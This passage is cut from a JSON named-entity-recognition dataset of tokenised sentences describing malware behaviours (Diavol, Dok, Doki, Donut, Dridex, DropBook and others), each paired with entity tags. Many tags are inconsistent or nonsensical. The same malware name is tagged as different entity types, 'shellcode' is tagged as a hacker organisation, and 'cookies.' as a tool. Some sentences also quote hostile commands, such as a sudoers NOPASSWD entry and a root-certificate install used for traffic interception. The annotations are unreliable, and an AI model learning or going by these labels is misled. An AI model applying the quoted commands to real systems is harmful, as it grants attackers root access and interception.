- "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Diavol", - "can", - "use", - "the", - "ARP", - "table", - "to", - "find", - "remote", - "hosts", - "to", - "scan." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Diavol", - "can", - "spread", - "throughout", - "a", - "network", - "via", - "SMB", - "prior", - "to", - "encryption." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Diavol", - "will", - "terminate", - "services", - "using", - "the", - "Service", - "Control", - "Manager", - "(SCM)", - "API." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "O", - "O" - ] - }, - { - "tokens": [ - "Diavol", - "has", - "obfuscated", - "its", - "main", - "code", - "routines", - "within", - "bitmap", - "images", - "as", - "part", - "of", - "its", - "anti-analysis", - "techniques." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Diavol", - "can", - "collect", - "the", - "computer", - "name", - "and", - "OS", - "version", - "from", - "the", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Diavol", - "can", - "enumerate", - "victims'", - "local", - "and", - "external", - "IPs", - "when", - "registering", - "with", - "C2." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Diavol", - "can", - "collect", - "the", - "username", - "from", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Diavol", - "has", - "used", - "HTTP", - "GET", - "and", - "POST", - "requests", - "for", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Dipsind", - "can", - "download", - "remote", - "files." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "Dipsind", - "can", - "be", - "configured", - "to", - "only", - "run", - "during", - "normal", - "working", - "hours,", - "which", - "would", - "make", - "its", - "communications", - "harder", - "to", - "distinguish", - "from", - "normal", - "traffic." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Dipsind", - "encodes", - "C2", - "traffic", - "with", - "base64." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Dipsind", - "encrypts", - "C2", - "data", - "with", - "AES256", - "in", - "ECB", - "mode." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Dipsind", - "uses", - "HTTP", - "for", - "C2." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Dipsind", - "can", - "spawn", - "remote", - "shells." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "A", - "Dipsind", - "variant", - "registers", - "as", - "a", - "Winlogon", - "Event", - "Notify", - "DLL", - "to", - "establish", - "persistence." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Disco", - "has", - "achieved", - "initial", - "access", - "and", - "execution", - "through", - "content", - "injection", - "into", - "DNS,", - "HTTP,", - "and", - "SMB", - "replies", - "to", - "targeted", - "hosts", - "that", - "redirect", - "them", - "to", - "download", - "malicious", - "files." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Disco", - "can", - "use", - "SMB", - "to", - "transfer", - "files." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Way", - "O", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "Disco", - "can", - "download", - "files", - "to", - "targeted", - "systems", - "via", - "SMB." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Disco", - "has", - "been", - "executed", - "through", - "inducing", - "user", - "interaction", - "with", - "malicious", - ".zip", - "and", - ".msi", - "files." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "Disco", - "can", - "create", - "a", - "scheduled", - "task", - "to", - "run", - "every", - "minute", - "for", - "persistence." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DnsSystem", - "can", - "direct", - "queries", - "to", - "custom", - "DNS", - "servers", - "and", - "return", - "C2", - "commands", - "using", - "TXT", - "records." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DnsSystem", - "can", - "upload", - "files", - "from", - "infected", - "machines", - "after", - "receiving", - "a", - "command", - "with", - "`uploaddd`", - "in", - "the", - "string." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DnsSystem", - "can", - "exfiltrate", - "collected", - "data", - "to", - "its", - "C2", - "server." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DnsSystem", - "can", - "download", - "files", - "to", - "compromised", - "systems", - "after", - "receiving", - "a", - "command", - "with", - "the", - "string", - "`downloaddd`." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DnsSystem", - "has", - "lured", - "victims", - "into", - "opening", - "macro-enabled", - "Word", - "documents", - "for", - "execution." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "B-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "DnsSystem", - "can", - "write", - "itself", - "to", - "the", - "Startup", - "folder", - "to", - "gain", - "persistence." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DnsSystem", - "can", - "Base64", - "encode", - "data", - "sent", - "to", - "C2." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DnsSystem", - "can", - "use", - "the", - "Windows", - "user", - "name", - "to", - "create", - "a", - "unique", - "identification", - "for", - "infected", - "users", - "and", - "systems." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DnsSystem", - "can", - "use", - "`cmd.exe`", - "for", - "execution." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "Dok", - "proxies", - "web", - "traffic", - "to", - "potentially", - "monitor", - "and", - "alter", - "victim", - "HTTP(S)", - "traffic." - ], - "ner_tags": [ - "B-Idus", - "O", - "I-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Dok", - "uses", - "AppleScript", - "to", - "create", - "a", - "login", - "item", - "for", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Dok", - "exfiltrates", - "logs", - "of", - "its", - "execution", - "stored", - "in", - "the", - "<code>/tmp</code>", - "folder", - "over", - "FTP", - "using", - "the", - "<code>curl</code>", - "command." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Dok", - "prompts", - "the", - "user", - "for", - "credentials." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Dok", - "installs", - "a", - "root", - "certificate", - "to", - "aid", - "in", - "Adversary-in-the-Middle", - "actions", - "using", - "the", - "command", - "<code>add-trusted-cert", - "-d", - "-r", - "trustRoot", - "-k", - "/Library/Keychains/System.keychain", - "/tmp/filename</code>." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Dok", - "installs", - "two", - "LaunchAgents", - "to", - "redirect", - "all", - "network", - "traffic", - "with", - "a", - "randomly", - "generated", - "name", - "for", - "each", - "plist", - "file", - "maintaining", - "the", - "format", - "<code>com.random.name.plist</code>." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Dok", - "gives", - "all", - "users", - "execute", - "permissions", - "for", - "the", - "application", - "using", - "the", - "command", - "<code>chmod", - "+x", - "/Users/Shared/AppStore.app</code>." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Dok", - "uses", - "AppleScript", - "to", - "install", - "a", - "login", - "Item", - "by", - "sending", - "Apple", - "events", - "to", - "the", - "<code>System", - "Events</code>", - "process." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Dok", - "downloads", - "and", - "installs", - "Tor", - "via", - "homebrew." - ], - "ner_tags": [ - "B-SamFile", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Dok", - "is", - "packed", - "with", - "an", - "UPX", - "executable", - "packer." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Tool", - "O", - "O" - ] - }, - { - "tokens": [ - "Dok", - "adds", - "<code>admin", - "ALL=(ALL)", - "NOPASSWD:", - "ALL</code>", - "to", - "the", - "<code>/etc/sudoers</code>", - "file." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Doki", - "has", - "used", - "the", - "embedTLS", - "library", - "for", - "network", - "communications." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Idus", - "O" - ] - }, - { - "tokens": [ - "Doki", - "has", - "used", - "a", - "script", - "that", - "gathers", - "information", - "from", - "a", - "hardcoded", - "list", - "of", - "IP", - "addresses", - "and", - "uploads", - "to", - "an", - "Ngrok", - "URL." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Doki", - "was", - "run", - "through", - "a", - "deployed", - "container." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Doki", - "has", - "used", - "the", - "DynDNS", - "service", - "and", - "a", - "DGA", - "based", - "on", - "the", - "Dogecoin", - "blockchain", - "to", - "generate", - "C2", - "domains." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Doki’s", - "container", - "was", - "configured", - "to", - "bind", - "the", - "host", - "root", - "directory." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Doki", - "has", - "used", - "Ngrok", - "to", - "establish", - "C2", - "and", - "exfiltrate", - "data." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-Purp" - ] - }, - { - "tokens": [ - "Doki", - "was", - "executed", - "through", - "an", - "open", - "Docker", - "daemon", - "API", - "port." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Doki", - "has", - "resolved", - "the", - "path", - "of", - "a", - "process", - "PID", - "to", - "use", - "as", - "a", - "script", - "argument." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Doki", - "has", - "downloaded", - "scripts", - "from", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Doki", - "has", - "disguised", - "a", - "file", - "as", - "a", - "Linux", - "kernel", - "module." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Doki", - "has", - "searched", - "for", - "the", - "current", - "process’s", - "PID." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Doki", - "has", - "executed", - "shell", - "scripts", - "with", - "/bin/sh." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Doki", - "has", - "communicated", - "with", - "C2", - "over", - "HTTPS." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Doki", - "has", - "used", - "the", - "dogechain.info", - "API", - "to", - "generate", - "a", - "C2", - "address." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "Donut", - "can", - "generate", - "shellcode", - "outputs", - "that", - "execute", - "via", - "Ruby." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "B-HackOrg", - "B-Features", - "O", - "O", - "O", - "B-Tool" - ] - }, - { - "tokens": [ - "Donut", - "can", - "patch", - "Antimalware", - "Scan", - "Interface", - "(AMSI),", - "Windows", - "Lockdown", - "Policy", - "(WLDP),", - "as", - "well", - "as", - "exit-related", - "Native", - "API", - "functions", - "to", - "avoid", - "process", - "termination." - ], - "ner_tags": [ - "O", - "O", - "I-Features", - "B-HackOrg", - "B-HackOrg", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Donut", - "can", - "erase", - "file", - "references", - "to", - "payloads", - "in-memory", - "after", - "being", - "reflectively", - "loaded", - "and", - "executed." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Donut", - "can", - "download", - "and", - "execute", - "previously", - "staged", - "shellcode", - "payloads." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Donut", - "can", - "generate", - "shellcode", - "outputs", - "that", - "execute", - "via", - "JavaScript", - "or", - "JScript." - ], - "ner_tags": [ - "O", - "O", - "I-Features", - "B-HackOrg", - "B-HackOrg", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Donut", - "code", - "modules", - "use", - "various", - "API", - "functions", - "to", - "load", - "and", - "inject", - "code." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O" - ] - }, - { - "tokens": [ - "Donut", - "can", - "generate", - "encrypted,", - "compressed/encoded,", - "or", - "otherwise", - "obfuscated", - "code", - "modules." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Donut", - "can", - "generate", - "shellcode", - "outputs", - "that", - "execute", - "via", - "PowerShell." - ], - "ner_tags": [ - "O", - "O", - "I-Features", - "B-HackOrg", - "B-HackOrg", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Donut", - "includes", - "subprojects", - "that", - "enumerate", - "and", - "identify", - "information", - "about", - "Process", - "Injection", - "candidates." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Donut", - "includes", - "a", - "subproject", - "<code>DonutTest</code>", - "to", - "inject", - "shellcode", - "into", - "a", - "target", - "process." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "B-SamFile", - "B-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Donut", - "can", - "generate", - "shellcode", - "outputs", - "that", - "execute", - "via", - "Python." - ], - "ner_tags": [ - "O", - "O", - "I-Features", - "B-HackOrg", - "B-HackOrg", - "O", - "O", - "O", - "B-Tool" - ] - }, - { - "tokens": [ - "Donut", - "can", - "generate", - "code", - "modules", - "that", - "enable", - "in-memory", - "execution", - "of", - "VBScript,", - "JScript,", - "EXE,", - "DLL,", - "and", - "dotNET", - "payloads." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "Donut", - "can", - "generate", - "packed", - "code", - "modules." - ], - "ner_tags": [ - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "Donut", - "can", - "generate", - "shellcode", - "outputs", - "that", - "execute", - "via", - "VBScript." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "B-HackOrg", - "B-HackOrg", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Donut", - "can", - "use", - "HTTP", - "to", - "download", - "previously", - "staged", - "shellcode", - "payloads." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DownPaper", - "uses", - "PowerShell", - "for", - "execution." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "DownPaper", - "searches", - "and", - "reads", - "the", - "value", - "of", - "the", - "Windows", - "Update", - "Registry", - "Run", - "key." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DownPaper", - "uses", - "PowerShell", - "to", - "add", - "a", - "Registry", - "Run", - "key", - "in", - "order", - "to", - "establish", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DownPaper", - "collects", - "the", - "victim", - "host", - "name", - "and", - "serial", - "number,", - "and", - "then", - "sends", - "the", - "information", - "to", - "the", - "C2", - "server." - ], - "ner_tags": [ - "B-SamFile", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DownPaper", - "collects", - "the", - "victim", - "username", - "and", - "sends", - "it", - "to", - "the", - "C2", - "server." - ], - "ner_tags": [ - "B-Way", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DownPaper", - "communicates", - "to", - "its", - "C2", - "server", - "over", - "HTTP." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "DownPaper", - "uses", - "the", - "command", - "line." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Downdelph", - "bypasses", - "UAC", - "to", - "escalate", - "privileges", - "by", - "using", - "a", - "custom", - "“RedirectEXE”", - "shim", - "database." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Downdelph", - "uses", - "search", - "order", - "hijacking", - "of", - "the", - "Windows", - "executable", - "sysprep.exe", - "to", - "escalate", - "privileges." - ], - "ner_tags": [ - "B-Idus", - "O", - "I-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "After", - "downloading", - "its", - "main", - "config", - "file,", - "Downdelph", - "downloads", - "multiple", - "payloads", - "from", - "C2", - "servers." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Downdelph", - "inserts", - "pseudo-random", - "characters", - "between", - "each", - "original", - "character", - "during", - "encoding", - "of", - "C2", - "network", - "requests,", - "making", - "it", - "difficult", - "to", - "write", - "signatures", - "on", - "them." - ], - "ner_tags": [ - "B-SamFile", - "B-Features", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Downdelph", - "uses", - "RC4", - "to", - "encrypt", - "C2", - "responses." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Dridex", - "has", - "encrypted", - "traffic", - "with", - "RSA." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Dridex", - "can", - "perform", - "browser", - "attacks", - "via", - "web", - "injects", - "to", - "steal", - "information", - "such", - "as", - "credentials,", - "certificates,", - "and", - "cookies." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "I-OffAct", - "I-OffAct", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O", - "O", - "B-Tool" - ] - }, - { - "tokens": [ - "Dridex", - "can", - "abuse", - "legitimate", - "Windows", - "executables", - "to", - "side-load", - "malicious", - "DLL", - "files." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Dridex", - "has", - "relied", - "upon", - "users", - "clicking", - "on", - "a", - "malicious", - "attachment", - "delivered", - "through", - "spearphishing." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Dridex", - "can", - "use", - "multiple", - "layers", - "of", - "proxy", - "servers", - "to", - "hide", - "terminal", - "nodes", - "in", - "its", - "infrastructure." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Dridex", - "has", - "used", - "the", - "<code>OutputDebugStringW</code>", - "function", - "to", - "avoid", - "malware", - "analysis", - "as", - "part", - "of", - "its", - "anti-debugging", - "technique." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Dridex's", - "strings", - "are", - "obfuscated", - "using", - "RC4." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Dridex", - "contains", - "a", - "backconnect", - "module", - "for", - "tunneling", - "network", - "traffic", - "through", - "a", - "victim's", - "computer.", - "Infected", - "computers", - "become", - "part", - "of", - "a", - "P2P", - "botnet", - "that", - "can", - "relay", - "C2", - "traffic", - "to", - "other", - "infected", - "peers." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "B-HackOrg", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Dridex", - "can", - "use", - "`regsvr32.exe`", - "to", - "initiate", - "malicious", - "code." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Dridex", - "contains", - "a", - "module", - "for", - "VNC." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Dridex", - "can", - "maintain", - "persistence", - "via", - "the", - "creation", - "of", - "scheduled", - "tasks", - "within", - "system", - "directories", - "such", - "as", - "`windows\\system32\\`,", - "`windows\\syswow64,`", - "`winnt\\system32`,", - "and", - "`winnt\\syswow64`." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "Dridex", - "has", - "collected", - "a", - "list", - "of", - "installed", - "software", - "on", - "the", - "system." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Dridex", - "has", - "encrypted", - "traffic", - "with", - "RC4." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Dridex", - "has", - "collected", - "the", - "computer", - "name", - "and", - "OS", - "architecture", - "information", - "from", - "the", - "system." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Dridex", - "has", - "used", - "POST", - "requests", - "and", - "HTTPS", - "for", - "C2", - "communications." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DropBook", - "can", - "unarchive", - "data", - "downloaded", - "from", - "the", - "C2", - "to", - "obtain", - "the", - "payload", - "and", - "persistence", - "modules." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DropBook", - "has", - "used", - "legitimate", - "web", - "services", - "to", - "exfiltrate", - "data." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DropBook", - "can", - "collect", - "the", - "names", - "of", - "all", - "files", - "and", - "folders", - "in", - "the", - "Program", - "Files", - "directories." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DropBook", - "can", - "download", - "and", - "execute", - "additional", - "files." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "DropBook", - "is", - "a", - "Python-based", - "backdoor", - "compiled", - "with", - "PyInstaller." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DropBook", - "has", - "checked", - "for", - "the", - "presence", - "of", - "Arabic", - "language", - "in", - "the", - "infected", - "machine's", - "settings." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DropBook", - "has", - "checked", - "for", - "the", - "presence", - "of", - "Arabic", - "language", - "in", - "the", - 